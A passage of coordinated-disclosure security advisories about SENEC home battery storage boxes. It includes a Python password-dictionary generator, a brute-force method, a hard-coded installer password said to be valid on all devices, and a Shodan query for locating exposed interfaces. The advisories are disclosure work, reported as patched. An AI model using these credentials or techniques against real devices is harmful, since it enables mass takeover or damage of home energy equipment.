~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-06-01: Vulnerability discovered 2023-06-05: Vulnerability reported to manufacturer 2023-09-11: Patch rollout by manufacturer to affected devices 2023-11-01: Public disclosure of vulnerability ************************************************************************ Researcher: Ph0s[4], R0ckE7 ************************************************************************ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 4.0 URL: https://creativecommons.org/licenses/by/4.0/deed.en </code></pre>

<pre><code>Advisory ID: Ph0s-2023-003 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Version(s): Firmware: all (as of 2023-06-19) Tested Version(s): current Vulnerability Type: CWE-307: Improper Restriction of Excessive Authentication Attempts CWE-798: Use of Hard-coded Credentials Risk Level: CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical) Manufacturer Risk Level Rating: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:H/RL:U/RC:C Overall CVSS Score: 8.6 Solution Status: Fixed Manufacturer Notification: 2023-06-05 Public Disclosure: 2023-11-01 CVE Reference: CVE-2023-39168 Author of Advisory: Ph0s[4], R0ckE7 ******************************************************************************** Overview: Foreword: This vulnerability was reported to the enbw-cert. we would like to thank enbw-cert for taking care of the vulns and patch the systems. we decided to publish when most of the reported vulns are patched to make sure nobody is harmed when 3rdparys exploit the mentioned vulns. About Senec: We are SENEC We have been the EnBW energy independence experts since 2018 – but we have put our heart and soul into guiding customers on the route to independence since SENEC was founded in 2009. Our passion lies in actively promoting the energy transition with innovative ideas and pioneering products. And, because we don’t do things by halves, our unwavering ambition is to create integrated solutions that enable you to enjoy the highest possible degree of independence and sustainability through self-generation of solar electricity. About SENEC Home: SENEC.Home: The smart electricity storage device for your home SENEC.Home is the heart of the your sustainable, affordable supply of solar electricity. The smart battery storage device stores excess electricity generated by your PV system so that you can use it when you need it – such as when your household’s energy consumption rises in the evening, or on rainy days when your PV system generates less power. ******************************************************************************** Vulnerability Details: Based on the previously identified hard-coded username in CVE-2023-39167 and CVE-2023-39168 all technical requirements were met to target the password. Since the username installateur is quite straightforward in the sense of guessable, it was decided to perform a dictonary-type brute force attack. For this purpose, all related PDF documents were downloaded to create a password list specifically tailored to SENEC.Inverter. Source of the Documents: https://senec.com/au/company/downloads ******************************************************************************** Proof of Concept (PoC): The attack consists of the following steps: 1. parse the documents : import argparse import glob import string import fitz def get_senec_password(pdf_directory, pwd_prefix, pwd_suffix): pdf_text = "" for file in glob.glob(f"{pdf_directory}/*.pdf"): pdf = fitz.open(file) for page in pdf: pdf_text += page.get_text() pdf_words = set( [word.strip(string.punctuation) for word in pdf_text.split() if word.strip(string.punctuation).isalnum()] ) senec_password = set( [f"{pwd_prefix}{word}{pwd_suffix}" for word in pdf_words if not word.isnumeric()] ) with open("senec-password.txt", mode="w", encoding="utf-8") as fd: fd.write('\n'.join(senec_password)) if __name__ == '__main__': parser = argparse.ArgumentParser(description="Generate SENEC.Inverter password dictionary") parser.add_argument("-d", "--pdf-directory", type=str, action="store", default="pdf", required=False, help="pdf storage location") parser.add_argument("-p", "--pwd-prefix", type=str, action="store", default="Senec", required=False, help="password prefix") parser.add_argument("-s", "--pwd-suffix", type=str, action="store", default="", required=False, help="password suffix") args = parser.parse_args() get_senec_password(args.pdf_directory, args.pwd_prefix, args.pwd_suffix) 2. work with the output: The Python script extracts all words from all PDF documents and allows to add a prefix and/or suffix to generate passwords according to the pattern {prefix}{word}{suffix} , such as the following: ***** cut ******* Senecmoribundity SenecCleaning Senecdusts Senecclinical Senecaggregation Senecstubborn Senecstorages SenecDecommissioning SenecInstall Senecmany ***** cut ******** 3) use the list within burpsuite The password lists were then used in Burp Suite Professional, a tool specifically designed for web application security testing, to perform an automated brute force attack. The list shown above as an excerpt with the prefix Senec and no suffix was finally successful in executing the attack. It could be determined that the password "SenecInstall" is valid for all SENEC.Inverter devices. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Patched by Manufacturer (Rolled out until September 11, 2023) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-06-01: Vulnerability discovered 2023-06-05: Vulnerability reported to manufacturer 2023-09-11: Patch rollout by manufacturer to affected devices 2023-11-01: Public disclosure of vulnerability ************************************************************************ Researcher: Ph0s[4], R0ckE7 ************************************************************************ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 4.0 URL: https://creativecommons.org/licenses/by/4.0/deed.en </code></pre>

<pre><code>Advisory ID: Ph0s-2023-005 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Version(s): Firmware: all (as of 2023-06-19) Tested Version(s): current Vulnerability Type: CWE-923: Improper Restriction of Communication Channel to Intended Endpoints Risk Level: CVSS v3.1 Vector: AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L (7.4 High) Manufacturer Risk Level Rating: AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L/E:H/RL:T/RC:C Overall CVSS Score: 7.2 Solution Status: Fixed Manufacturer Notification: 2023-06-05 Public Disclosure: 2023-11-01 CVE Reference: CCVE-2023-39171 Author of Advisory: Ph0s[4], R0ckE7 ******************************************************************************** Overview: Foreword: This vulnerability was reported to the enbw-cert. we would like to thank enbw-cert for taking care of the vulns and patch the systems. we decided to publish when most of the reported vulns are patched to make sure nobody is harmed when 3rdparys exploit the mentioned vulns. About Senec: We are SENEC We have been the EnBW energy independence experts since 2018 – but we have put our heart and soul into guiding customers on the route to independence since SENEC was founded in 2009. Our passion lies in actively promoting the energy transition with innovative ideas and pioneering products. And, because we don’t do things by halves, our unwavering ambition is to create integrated solutions that enable you to enjoy the highest possible degree of independence and sustainability through self-generation of solar electricity. About SENEC Home: SENEC.Home: The smart electricity storage device for your home SENEC.Home is the heart of the your sustainable, affordable supply of solar electricity. The smart battery storage device stores excess electricity generated by your PV system so that you can use it when you need it – such as when your household’s energy consumption rises in the evening, or on rainy days when your PV system generates less power. ******************************************************************************** Vulnerability Details: The management interface of the SENEC.Inverter is publicly accessible via the Internet. This circumstance is recommended by the manufacturer and customers are advised to open the necessary ports to enable remote maintenance. As a result, anyone who manages to detect and successfully exploit security vulnerabilities in SENEC.Inverter, for instance the authors of this report, can access and compromise all devices available on the internet without restrictions. To achieve this,it is possible to use an IoT search engine such as Shodan to automatically obtain an up-to-date list of IP addresses of all devices in just a few seconds. Besides Shodan, there are other IoT search engines such as Censys or ZoomEye to complement the list even further. Consequently, it is very easy for an attacker to develop an exploit script for the automated compromise of all SENEC.Inverter devices, e.g. to simul- taneously shut down all appliances or to damage them through a targeted overload. For this purpose, only the hard-coded credentials previously identified in findings CVE-2023-39168 and CVE-2023-39169 need to be used in conjunction with SENEC.Inverter’s built-in API. ******************************************************************************** Proof of Concept (PoC): The attack consists of the following steps: 1. use the shodan dork to obtain management-interfaces. (no longer valid, patched by manufacturer) https://www.shodan.io/search?query=http.html%3A%3Ctitle%3ESENEC%3C%2Ftitle% 3E ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Patched by Manufacturer (Rolled out until September 11, 2023) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-06-01: Vulnerability discovered 2023-06-05: Vulnerability reported to manufacturer 2023-09-11: Patch rollout by manufacturer to affected devices 2023-11-01: Public disclosure of vulnerability ************************************************************************ Researcher: Ph0s[4], R0ckE7 ************************************************************************ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 4.0 URL: https://creativecommons.org/licenses/by/4.0/deed.en </code></pre>